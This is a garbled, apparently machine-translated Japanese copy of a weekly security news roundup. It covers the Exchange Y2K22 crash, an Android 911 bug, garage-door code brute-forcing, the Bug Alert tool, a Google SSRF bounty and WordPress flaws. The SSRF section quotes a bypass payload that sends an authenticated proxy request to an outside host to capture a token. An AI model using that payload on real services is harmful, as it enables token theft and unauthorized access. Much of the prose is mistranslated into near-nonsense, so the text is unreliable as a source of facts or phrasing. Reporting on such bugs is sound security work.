デジタル製品の作り方+デジタル製品の種類。 Uncategorized セキュリティで今週:y2k22、意図せずに911、バグアラート

セキュリティで今週:y2k22、意図せずに911、バグアラート

あなたが今週の今週のMicrosoft Exchange Serverを実行するという不幸があった場合、あなたは私にy2k22問題についてあなたに言う必要はありません。私たちの残りの部分を捉えるために、Exchangeが2022の非常に最初のマルウェア定義の更新をダウンロードしようとしたとき、新しい定義のバージョン番号はマルウェア検出エンジンで事故を引き起こしました。日付は文字列2201010001として表され、そもも最初の2桁は年を表します。この文字列は、2,147,483,647でマキシを超える符号付き長整数に変換されます。整数オーバーフロー、および結果は未定義の動作であり、エンジンをクラッシュさせます。サーバーは安全な作業を停止し、ワーキングマルウェアエンジンなしであらゆる種類のメッセージを処理しません。嬉しい新年!

Android 911サービス拒否

緊急サービスのためのダイヤル911は、ソフトウェアアプリケーションのバグがそれ自体を明示するのに非常に最悪の時間です。 Googleは、1月のAndroidアップデートでそのようなバグを修正しました。それは彼らの奇妙な意図しないアプリ相互作用の1つです – この状況では、MicrosoftチームはAndroidのバグを引き起こします。チームアプリがインストールされている場合、アカウントはログインしていない、チームはすべての起動時に新しいPhoneaccountアイテムを登録します。これはまれであるべきですが、Android上のチームは同様に個人を自発的にログアウトするために悪名高いです。あなたが911をダイヤルすると、Androidはルーチンを実行して、どのPhoneAccountがコールを経路に利用されるべきか、そしてハッシュを比較することによって関係を解決します。その比較は単純な減算であり、不利な結果を得ることに50%の可能性があることを意味します。これは予期せず、クラッシュにつながった。

ガレージドアリバースエンジニアリング

リバースエンジニアリング30歳のワイヤレス認証計画は、最も利益の恐れではないかもしれませんが、ある場合には旅行はそれ自身の報酬です。 [Maxwell Dulin]は私たちに物語をもたらします、そしてこの旅は間違いなく価値があります。このハックの基本は確かに実行可能で、ハードウェアを見てから始めています。ガレージドアは、コードを送信しながら受信機に押しボタンを押しながらガレージドアオープナーに同期されています。オープナーの内側には、それぞれが3つの位置を持つ9つのディップスイッチがあります。彼らは何をしますか?彼は自分の信頼できるSDRを引き出して、Webトラフィックを取得し、シグナルを復号しようとしました。 InspectrumとGNUラジオがここにあるヒーローズでした、この簡単な認証方式に関する洞察を提供しました。この実際のガレージのドアでの最後の考え?あらゆる可能なコンボを送信することによって、未知のコードを強制的に強制することができます。また、104分です。

bug bug

あなたがsysadminであれば、あなたはいくつかの問題が瞬時に電話をかけることを理解しています。 Javaサーバーを実行した場合、LOG4Jの脆弱性は、反応プロトコルの終了テストでした。公開開示の間の時間とあなたがそれについて聞いたときのいつでも、災害を抑えるのに十分であるかもしれません。フレームワークと同様にいくつかのバグ報告サービスがありますが、このニッチを利用することは訴訟を起こすものはありません。未完成のニッチのバグ[Matthew Sullivan]、新しいプロジェクト、バグアラートを明らかにしました。それはすべてオープンソースですので、本当にしたい場合はあなた自身のインスタンスを保持することができます。ツイート、テキスト、または偶数の電話を取得することを選択できます。これは有益なツールになる前向きを持っています、見てください!

私は、バグアラートを特定の奇妙なalの歌からセットしたようにする必要があります…

ゾンビSSRF.

[DavidSchütz]は、あなたが自分自身をデモすることができるjobs.googleapis.comを見つけただけでなく、曖昧なGoogle APIを探していました。そのデモは面白いですが、完全な枠組みのサービスではないので、本物のバックエンドと話します。要求は、デモページの認証手順を処理するプロキシCXL-Services.appspot.comで行く。彼がサーバーサイドの要求偽造(SSRF)をオフにするかもしれない場合、彼は認証された要求に到達することができます、そしておそらく彼の代わりにWebトラフィックを送信するためのプロキシをテクニカルにすることができます。 URLの解析は難しいです。うまくいったテクニック? URLのバックスラッシュ。 /proxy ?url=https://sfmnev.vps.xdavidhu.me\@jobs.googleapis.com/http / 1.1

トークンへの利得が手に入れることで、[David]は他のGoogle APIをチェックし始めて、このトークンが自分にアクセスできるようになったことを確認しました。彼は私たちが以前にカバーした警告を提供し、正確にあなたがどのくらいプッシュするかを正確に慎重にします。彼はバグを最もよく報告したかもしれませんが、彼が本当にオンラインのトークンへのアクセスを持っていたことを確認したいと思った。トークンを確認した後は、アクセスをチェックアウトした後、彼は最新のレポートのための追加の1000ドル、横方向の動きを慎重に見ています。それはそれがあることがあります、正しいですか?いいえ。 90日間の開示期限が渡される直前、[David]は修理バイパスを見つけました。 addバックスラッシュと@の間のテキストの種類は任意のタイプのテキストであったのです。 もう1米ドル3133.70。 楽しみのためだけに、彼は古いURLを調べました、それは修正後にサービスに入ってはいけません。 うん、彼はもう1つの安全とセキュリティトークン、そして網3133.70を発見しました。 Twitterで証明されるように、このゾンビSSRFはまだ死んでいません。

WordPress Update.

WordPressインスタンスを自動的に更新するように設定していない場合は、最新バージョンを検査する時が来ました。 ここでは、ここでは4つの潜在的に有害な問題がありますが、詳細はこの時点では不足しています。 非常に初めて、公開スラグ、公開名と一致するURLの一部では、クロスサイトスクリプティングの脆弱性です。 論じられている第2の問題は、いくつかのマルチサイト構成におけるアイテム注入である。 最後の2つの脆弱性はSQLインジェクションです。 ミーム。

Leave a Reply

Your email address will not be published. Required fields are marked *